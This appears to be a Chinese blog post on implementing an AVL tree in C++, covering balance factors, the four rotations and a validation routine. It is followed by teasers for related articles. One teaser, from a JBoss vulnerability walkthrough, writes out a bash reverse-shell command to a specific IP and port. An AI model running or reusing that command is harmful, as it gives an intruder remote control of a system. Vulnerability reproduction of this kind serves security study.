移情别恋c++ ദ്ദി˶ー̀֊ー́ ) ——14.AVL树

news2024/12/25 23:49:28

1.AVL 树

1.1AVL 树的概念

二叉搜索树虽可以缩短查找的效率,但如果数据有序或接近有序二叉搜索树将退化为单支树,查 找元素相当于在顺序表中搜索元素,效率低下。因此,两位俄罗斯的数学家G.M.Adelson-Velskii 和E.M.Landis在1962年 发明了一种解决上述问题的方法:当向二叉搜索树中插入新结点后,如果能保证每个结点的左右 子树高度之差的绝对值不超过1(需要对树中的结点进行调整),即可降低树的高度,从而减少平均 搜索长度。

一棵AVL树或者是空树,或者是具有以下性质的二叉搜索树:

1.它的左右子树都是AVL树

2.左右子树高度之差(简称平衡因子)的绝对值不超过1(-1/0/1)

如果一棵二叉搜索树是高度平衡的,它就是AVL树。如果它有n个结点,其高度可保持在 O(log_2 n),搜索时间复杂度O(log_2 n)。

2.AVL树节点的定义 

template<class K ,class V>
struct AVLtreenode
{
	AVLtreenode<K, V>* _left;    //右节点
	AVLtreenode<K, V>* _right;   //左节点
	AVLtreenode<K, V>* _parent;  //父节点,三叉链表

	pair<K, V> kv;

	int bf;//右子树高度-左子树高度,只有孩子发生变化,bf才有可能发生变化!!!!,若改变父亲,bf不变!!!!!!


	AVLtreenode(const pair<K, V>& _kv)    //初始化列表
		:_left(nullptr)
		,_right(nullptr)
		,_parent(nullptr)
		,kv(_kv)
		,bf(0)
	{}
};

3.AVL树的插入!!!!!!! 

3.1初步插入

初步插入与bst的插入一致,不过里面的数据类型是pair<first,second>,并且是根据first进行比较

if (root == nullptr)
{
	root = new node(_kv);
	return true;
}
node* parent = nullptr; //比bst多了一个parent
node* cur = root;       //

while (cur)
{
	parent = cur;
	if (cur->kv.first < _kv.first)
	{
		cur = cur->_right;
	}
	else if (cur->kv.first > _kv.first)
	{
		cur = cur->_left;
	}
	else
	{
		return false;
	}
}
cur = new node(_kv);
if (parent->kv.first < _kv.first)
{
	parent->_right = cur;
}
else
{
	parent->_left = cur;
}
cur->_parent = parent;    //记得连接parent和cur

3.2调整平衡因子 

while (cur != root)
{
	if (cur == parent->_left)
		parent->bf--;//第一次!!!检查parent左边原来必为空
	else {
		parent->bf++;//第一次!!!检查parent右边原来必为空
	}

	if (parent->bf == 0) //相当于bf没改变,可直接退出
	{
		break;
	}

	else if (parent->bf == 1 || parent->bf == -1) //bf改变了继续向上找   
	{
		cur = parent;
		parent = parent->_parent;
	}

	else if(parent->bf == -2 || parent->bf == 2)
	{          //-2||2,需要调整(旋转)
		if (parent->bf == 2 && cur->bf == 1)
		{
			rotateL(parent);//单左旋,全在右边加
		}

		else if (parent->bf == -2 && cur->bf == -1)
		{
			rotateR(parent);//单右旋,全在左边加
		}

		else if (parent->bf == 2 && cur->bf == -1)
		{
			rotateRL(parent);//先右旋再左旋
		}

		else if (parent->bf == -2 && cur->bf == 1)
		{
			rotateLR(parent);//先左旋再右旋
		}


		//旋转让子树变得平衡
		//旋转降低了子树的高度,恢复到和插入前一样的高度,所以对上一层没有影响
		break;//1次旋转完成后不需要再调整了
	}
}

3.3旋转调整!!!!!! 

1.新节点插入较高右子树的右侧---右右:左单旋

 

 由上述可知,c必定是x类型的avl树,如果是其他类型的,可能60这个节点的平衡因子就变成-2或2了,(当然,这只是单独举一个例子分析,便于分析代码,不代表所有情况)

void rotateL(node* parent)//左旋,(新节点插入到较高右子树的右侧)//   1.右右
{
	node* subr = parent->_right;
	node* subrl = subr->_left;

	parent->_right = subrl;
	subr->_left= parent;

	node* ppnode = parent->_parent;
	parent->_parent = subr;

	if (subrl) //subrl可能为空!!!!!!!!!!!!!!!
	{
		subrl->_parent = parent;
	}

	if (parent == root) // 即如果parent->_parent==nullptr
	{
		root = subr;
		subr->_parent = nullptr;
	}

	else
	{
		if (ppnode->_left == parent)   //需要再查找一下放左边还是右边
		{
			ppnode->_left = subr;
		}
		else if (ppnode->_right == parent)
		{
			ppnode->_right = subr;
		}

		subr->_parent = ppnode;
	}
	parent->bf = subr->bf = 0;   //重置平衡因子
}

2.新节点插入较高左子树的左侧---左左:右单旋 

和左单旋分析方法一致

void rotateR(node* parent)//右旋,(新节点插入到较高左子树的左侧)//   2.左左
{

	node* subl = parent->_left;
	node* sublr = subl->_right;
	parent->_left = sublr;


	if (sublr)               //sublr可能为空!!!!!!!
	sublr->_parent = parent;
	
	node* ppnode = parent->_parent;

	subl->_right = parent;
	parent->_parent=subl;

	if (root == parent)
	{
		root = subl;
		subl->_parent = nullptr;
	}

	else
	{
		if (ppnode->_left == parent)
		{
			ppnode->_left = subl;
		}
		else if (ppnode->_right == parent)
		{
			ppnode->_right = subl;
		}

		subl->_parent = ppnode;
	}
	 

	subl->bf = parent->bf = 0;//重置平衡因子

}

3. 新节点插入较高左子树的右侧---左右:先左单旋再右单旋

十分巧妙的是:经过一次左旋(parent->_left)后,就变成左左类型,这样就能复用右单旋(parent)达成平衡 

void rotateLR(node* parent)//左旋一次,再右旋一次,还需要根据不同的_bf更新平衡因子
{

	node* subl = parent->_left;
	node* sublr= subl->_right;
	int _bf = sublr->bf;

	rotateL(parent->_left);
	rotateR(parent);

	if (_bf == 0)
	{
		//sublr自己就是新增加的节点
		parent->bf = subl->bf = sublr->bf = 0;
	}

	else if (_bf == 1)
	{
		//sublr的右子树新增
		parent->bf = 0;
		subl->bf = -1;
		sublr->bf = 0;
	}

	else if (_bf == -1)
	{
		//sublr的左子树新增
		parent->bf = 1;
		subl->bf = 0;
		sublr->bf = 0;
	}
}

4.新节点插入较高右子树的左侧---右左:先右单旋再左单旋  

与上方分析方法一致

void rotateRL(node* parent)   //右旋一次,再左旋一次,还需要根据不同的_bf更新平衡因子
{
	node* subr = parent->_right;
	node* subrl = subr->_left;
	int _bf = subrl->bf;

	rotateR(parent->_right);
	rotateL(parent);

	if (_bf == 0)
	{
		//subrl自己就是新增加的节点
		parent->bf = subr->bf = subrl->bf = 0;
	}

	else if (_bf == -1)
	{
		//subrl的右子树新增
	    parent->bf = 0;
	    subr->bf = 1;
	    subrl->bf = 0;
	}

	else if (_bf == 1)
	{   
		//subrl的左子树新增
		parent->bf = -1;
		subr->bf = 0;
		subrl->bf = 0;
	}
}

总结:

假如以pParent为根的子树不平衡,即pParent的平衡因子为2或者-2,分以下情况考虑

1. pParent的平衡因子为2,说明pParent的右子树高,设pParent的右子树的根为pSubR

当pSubR的平衡因子为1时,执行左单旋

当pSubR的平衡因子为-1时,执行右左双旋

2. pParent的平衡因子为-2,说明pParent的左子树高,设pParent的左子树的根为pSubL

当pSubL的平衡因子为-1是,执行右单旋

当pSubL的平衡因子为1时,执行左右双旋

旋转完成后,原pParent为根的子树个高度降低,已经平衡,不需要再向上更新。  

4.AVL树的判断 

 AVL树是在二叉搜索树的基础上加入了平衡性的限制,因此要验证AVL树,可以分两步:

1. 验证其为二叉搜索树

:如果中序遍历可得到一个有序的序列,就说明为二叉搜索树

2. 验证其为平衡树

(1)每个节点子树高度差的绝对值不超过1(注意节点中如果没有平衡因子)

(2)节点的平衡因子是否计算正确  

void inorder()
{
	_inorder(root);
}

void _inorder(node* root)
{
	if (root == nullptr)
		return;
	_inorder(root->_left);
	cout << root->kv.first << " ";
	_inorder(root->_right);
}

int _height(node* root)//取得高度
{
	if (root == nullptr)
		return 0;

	int lh = _height(root->_left);
	int rh = _height(root->_right);

	return lh > rh ? lh + 1 : rh + 1;//记得+1
}


bool isbalance()
{
	return _isbalance(root);
}

bool _isbalance(node* root)
{
	if (root == nullptr)
		return true;

	int lh = _height(root->_left);
	int rh = _height(root->_right);

	if ((rh - lh) !=root->bf)//判断是否符合平衡因子计算公式
	{
		cout << "异常" << endl;
		return false;
	}

	return (rh - lh) <2 && (rh - lh)>-2 && _isbalance(root->_left) && _isbalance(root->_right);//递归判断左右子树
}

5.完整代码 

 AVL.h:

template<class K ,class V>
struct AVLtreenode
{
	AVLtreenode<K, V>* _left;
	AVLtreenode<K, V>* _right;
	AVLtreenode<K, V>* _parent;

	pair<K, V> kv;

	int bf;//右子树高度-左子树高度,只有孩子发生变化,bf才有可能发生变化!!!!,若改变父亲,bf不变!!!!!!


	AVLtreenode(const pair<K, V>& _kv)
		:_left(nullptr)
		,_right(nullptr)
		,_parent(nullptr)
		,kv(_kv)
		,bf(0)
	{}
};

template<class K, class V>
class AVLtree
{
public:
	typedef AVLtreenode<K, V> node;

	bool insert(const pair<K,V>& _kv)
	{
		if (root == nullptr)
		{
			root = new node(_kv);
			return true;
		}
		node* parent = nullptr; //比bst多了一个parent
		node* cur = root;       //

		while (cur)
		{
			parent = cur;
			if (cur->kv.first < _kv.first)
			{
				cur = cur->_right;
			}
			else if (cur->kv.first > _kv.first)
			{
				cur = cur->_left;
			}
			else
			{
				return false;
			}
		}
		cur = new node(_kv);
		if (parent->kv.first < _kv.first)
		{
			parent->_right = cur;
		}
		else
		{
			parent->_left = cur;
		}
		cur->_parent = parent;

		//开始调整

		//调整平衡因子
		while (cur != root)
		{
			if (cur == parent->_left)
				parent->bf--;//第一次!!!检查parent左边原来必为空
			else {
				parent->bf++;//第一次!!!检查parent右边原来必为空
			}

			if (parent->bf == 0) //相当于bf没改变,可直接退出
			{
				break;
			}

			else if (parent->bf == 1 || parent->bf == -1) //bf改变了继续向上找   
			{
				cur = parent;
				parent = parent->_parent;
			}

			else if(parent->bf == -2 || parent->bf == 2)
			{          //-2||2,需要调整(旋转)
				if (parent->bf == 2 && cur->bf == 1)
				{
					rotateL(parent);//单左旋,全在右边加
				}

				else if (parent->bf == -2 && cur->bf == -1)
				{
					rotateR(parent);//单右旋,全在左边加
				}

				else if (parent->bf == 2 && cur->bf == -1)
				{
					rotateRL(parent);//先右旋再左旋
				}

				else if (parent->bf == -2 && cur->bf == 1)
				{
					rotateLR(parent);//先左旋再右旋
				}


				//旋转让子树变得平衡
				//旋转降低了子树的高度,恢复到和插入前一样的高度,所以对上一层没有影响
				break;//1次旋转完成后不需要再调整了
			}
		}
	
		return true;
	}

	void rotateL(node* parent)//左旋,(新节点插入到较高右子树的右侧)//   1.右右
	{
		node* subr = parent->_right;
		node* subrl = subr->_left;

		parent->_right = subrl;
		subr->_left= parent;

		node* ppnode = parent->_parent;
		parent->_parent = subr;

		if (subrl) //subrl可能为空!!!!!!!
		{
			subrl->_parent = parent;
		}

		if (parent == root) //即如果parent->_parent==nullptr
		{
			root = subr;
			subr->_parent = nullptr;
		}

		else
		{
			if (ppnode->_left == parent)
			{
				ppnode->_left = subr;
			}
			else if (ppnode->_right == parent)
			{
				ppnode->_right = subr;
			}

			subr->_parent = ppnode;
		}
		parent->bf = subr->bf = 0;   //重置平衡因子
	}


	void rotateR(node* parent)//右旋,(新节点插入到较高左子树的左侧)//   2.左左
	{

		node* subl = parent->_left;
		node* sublr = subl->_right;
		parent->_left = sublr;


		if (sublr)               //sublr可能为空!!!!!!!
		sublr->_parent = parent;
		
		node* ppnode = parent->_parent;

		subl->_right = parent;
		parent->_parent=subl;

		if (root == parent)
		{
			root = subl;
			subl->_parent = nullptr;
		}

		else
		{
			if (ppnode->_left == parent)
			{
				ppnode->_left = subl;
			}
			else if (ppnode->_right == parent)
			{
				ppnode->_right = subl;
			}

			subl->_parent = ppnode;
		}
		 

		subl->bf = parent->bf = 0;

	}


	void rotateRL(node* parent)   //右旋一次,再左旋一次,还需要根据不同的_bf更新平衡因子
	{
		node* subr = parent->_right;
		node* subrl = subr->_left;
		int _bf = subrl->bf;

		rotateR(parent->_right);
		rotateL(parent);

		if (_bf == 0)
		{
			//subrl自己就是新增加的节点
			parent->bf = subr->bf = subrl->bf = 0;
		}

		else if (_bf == -1)
		{
			//subrl的右子树新增
		    parent->bf = 0;
		    subr->bf = 1;
		    subrl->bf = 0;
		}

		else if (_bf == 1)
		{   
			//subrl的左子树新增
			parent->bf = -1;
			subr->bf = 0;
			subrl->bf = 0;
		}
	}


	void rotateLR(node* parent)//左旋一次,再右旋一次,还需要根据不同的_bf更新平衡因子
	{

		node* subl = parent->_left;
		node* sublr= subl->_right;
		int _bf = sublr->bf;

		rotateL(parent->_left);
		rotateR(parent);

		if (_bf == 0)
		{
			//sublr自己就是新增加的节点
			parent->bf = subl->bf = sublr->bf = 0;
		}

		else if (_bf == 1)
		{
			//sublr的右子树新增
			parent->bf = 0;
			subl->bf = -1;
			sublr->bf = 0;
		}

		else if (_bf == -1)
		{
			//sublr的左子树新增
			parent->bf = 1;
			subl->bf = 0;
			sublr->bf = 0;
		}
	}

	void inorder()
	{
		_inorder(root);
	}

	void _inorder(node* root)
	{
		if (root == nullptr)
			return;
		_inorder(root->_left);
		cout << root->kv.first << " ";
		_inorder(root->_right);
	}

	int _height(node* root)
	{
		if (root == nullptr)
			return 0;

		int lh = _height(root->_left);
		int rh = _height(root->_right);

		return lh > rh ? lh + 1 : rh + 1;
	}


	bool isbalance()
	{
		return _isbalance(root);
	}

	bool _isbalance(node* root)
	{
		if (root == nullptr)
			return true;

		int lh = _height(root->_left);
		int rh = _height(root->_right);

		if ((rh - lh) !=root->bf)
		{
			cout << "异常" << endl;
			return false;
		}

		return (rh - lh) <2 && (rh - lh)>-2 && _isbalance(root->_left) && _isbalance(root->_right);
	}

private:
	node* root = nullptr;
};

test.c:

#define _CRT_SECURE_NO_WARNINGS
#include<iostream>
#include<map>

using namespace std;

#include"AVL.h"

int main()
{
	int arr[] = { 4, 2, 6, 1, 3, 5, 15, 7, 16, 14 };
	//int arr[] = { 16, 3, 7, 11, 9, 26, 18, 14, 15 };
	AVLtree<int, int> it;
	for (auto i : arr)
	{
		it.insert(make_pair(i,i));
	}
	it.inorder();
	cout << endl<<it.isbalance() << endl;

	return 0;
}

6.AVL树的性能

AVL树是一棵绝对平衡的二叉搜索树,其要求每个节点的左右子树高度差的绝对值都不超过1,这 样可以保证查询时高效的时间复杂度,即$og_2 (N)。但是如果要对AVL树做一些结构修改的操 作,性能非常低下,比如:插入时要维护其绝对平衡,旋转的次数比较多,更差的是在删除时, 有可能一直要让旋转持续到根的位置。因此:如果需要一种查询高效且有序的数据结构,而且数 据的个数为静态的(即不会改变),可以考虑AVL树,但一个结构经常修改,就不太适合。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2158422.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Redis事务总结

1.事务介绍 Redis 事务是一个用于将多个命令打包在一起执行的功能&#xff0c;它可以确保这些命令按照顺序执行&#xff0c;并且具有原子性。这意味着事务中的命令要么全部执行&#xff0c;要么全部不执行&#xff0c;这有助于保持数据的一致性。 Redis 事务本质&#xff1a;…

小程序开发设计-协同工作和发布:协同工作⑧

上一篇文章导航&#xff1a; 小程序开发设计-小程序的宿主环境&#xff1a;组件⑦-CSDN博客https://blog.csdn.net/qq_60872637/article/details/142455350?spm1001.2014.3001.5501 注&#xff1a;不同版本选项有所不同&#xff0c;并无大碍。 目录 上一篇文章导航&#x…

Matlab/simulink低版本打开高版本

很简单&#xff0c;取消”预设“下一个选项的勾即可&#xff0c; 我是21a&#xff0c;打开21b的simulink亲测有效&#xff0c;以下是过程记录

校园社区服务系统小程序的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;用户管理&#xff0c;发布类型管理&#xff0c;互帮互助管理&#xff0c;物品分类管理&#xff0c;闲置交易管理&#xff0c;购买物品管理&#xff0c;反馈信息系统管理 微信端账号功能包括&#xff1…

lammps计算区域压力的两种方法

大家好,我是小马老师。 本文介绍lammps计算区域压力的两种方法。 在lammps模拟中,计算某一个固定区域内气体或者液态的压力,可以先计算该区域内所有单个原子的应力,然后把区域内原子的应力值求和再除以体积。 只有处于该区域内的原子参与压力的计算,当原子移动出该区域后,…

如何合并pdf文件,四款软件,三步搞定!

在数字化办公的浪潮中&#xff0c;PDF文档因其跨平台兼容性和安全性&#xff0c;成为了我们日常工作中不可或缺的一部分。然而&#xff0c;面对多个PDF文件需要整合成一个文件时&#xff0c;不少小伙伴可能会感到头疼。别担心&#xff0c;今天我们就来揭秘四款高效PDF合并软件&…

JBOSS中间件漏洞复现

CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…

Linux C# Day4

作业&#xff1a; 1.统计家目录下.c文件的个数 #!/bin/bash num0 for filename in ls ~/*.c do((num)) done echo $num2.定义一个稀疏数组(下标不连续)&#xff0c;写一个函数&#xff0c;求该稀疏数组的和&#xff0c;要求稀疏数组中的数值通过参数传递到函数中arr([2]9 [4…

基于单片机的自行车智能辅助系统设计

文章目录 前言资料获取设计介绍功能介绍设计程序具体实现截图目 录设计获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师&#xff0c;一名热衷于单片机技术探索与分享的博主、专注于 精通51/STM32/MSP430/AVR等单片机设计 …

多数元素-简单

169. 多数元素 - 力扣&#xff08;LeetCode&#xff09; 【LeetCode 每日一题】169. 多数元素 | 手写图解版思路 代码讲解_哔哩哔哩_bilibili c为计数器&#xff0c;代表当前候选人的票数 v为当前候选人 x为遍历的各候选人得票 分三种情况&#xff1a; 第一种&#xff0c;c…

OpenBayes 一周速览|IC-Light 图片打光神器一键启动!Tecnalia 电子设备废物高光谱数据集上线,提高电子废物回收准确性

公共资源速递 This Weekly Snapshots &#xff01; 5 个数据集&#xff1a; * BTAD 工业异常数据集 * WebVid 大型短视频数据集 * bAbi 问答和文本理解的数据集 * OpenMIR 音乐收听脑电图数据集 * Tecnalia 电子设备废物高光谱数据集 2 个教程&#xff1a; * ComfyUl …

12. Inseq 特征归因:可视化解释 LLM 的输出

Feature Attribution&#xff08;特征归因&#xff09;&#xff1a;你可以将其当做对模型输出的解释&#xff0c;就像在图像分类中可视化模型关注的区域一样。 本文将介绍 Inseq&#xff0c;这是一个用于解释和可视化序列生成模型输出的工具。我们将通过翻译任务&#xff08;关…

Flink 本地启动的多种方式

Flink 本地启动的多种方式 Application模式通过代码提交到Yarn上启动 //设置Yarn客户端 YarnClient yarnClient ; Configuration configuration new Configuration(); if (customConfiguration ! null) {configuration.addAll(customConfiguration); } configuration.set(Jo…

Linux——虚拟机网络配置

进行虚拟机网络配置是确保虚拟机能够正常访问网络、与宿主机及其他设备进行通信的关键步骤。虚拟机网络配置允许用户根据实际需求选择合适的网络模式&#xff0c;并调整网络参数以满足特定的网络环境要求。 虚拟机常见的三种网络模式包括桥接模式、NAT模式和主机模式&#xff…

Shiro rememberMe反序列化漏洞(Shiro-550) 靶场攻略

漏洞原理 Apache Shiro框架提供了记住密码的功能&#xff08;RememberMe&#xff09;&#xff0c;⽤户登录成功后会⽣成经过 加密并编码的cookie。在服务端对rememberMe的cookie值&#xff0c;先base64解码然后AES解密再反 序列化&#xff0c;就导致了反序列化RCE漏洞。 那么&a…

制作网上3D展馆需要什么技术并投入多少费用?

制作网上3D展览馆项目&#xff0c;需要考虑以下技术和预算方面的信息&#xff1a; 技术需求&#xff1a; 1、三维建模技术&#xff1a;利用3D软件&#xff08;3ds max、maya、blender、c4d等&#xff09;制作展馆和展品的3D模型 2、Web3D技术&#xff1a;如WebGL&#xff0c…

飞腾平台perf工具PMU事件集成指南

【写在前面】 飞腾开发者平台是基于飞腾自身强大的技术基础和开放能力&#xff0c;聚合行业内优秀资源而打造的。该平台覆盖了操作系统、算法、数据库、安全、平台工具、虚拟化、存储、网络、固件等多个前沿技术领域&#xff0c;包含了应用使能套件、软件仓库、软件支持、软件适…

VMware安装ubuntu24.04桌面版

一、安装推荐要求 双核2 GHz处理器或更高 4 GB系统内存 25 GB磁盘存储空间 可访问的互联网 光驱或USB安装介质 二、下载桌面系统 下载地址&#xff08;使用手机转存再下载是对作者的最大支持&#xff09;&#xff1a;夸克网盘分享 (quark.cn) 已安装的纯净版ubuntu虚拟…

CMake 构建Qt程序弹出黑色控制台

CMake 构建Qt程序弹出黑色控制台

普通查询+聚合函数的使用(8个例子,数值和字符串的比较)

目录 回顾普通查询聚合函数的使用 表数据 例子1 例子2 例子3 ​​​​​​​例子4 例子5 例子6 例子7(数值和字符串的比较) 例子8 回顾普通查询聚合函数的使用 之前我们介绍过聚合函数 --mysql分组查询 -- 聚合函数(介绍,使用),group by使用,分组聚合统计(使用,havi…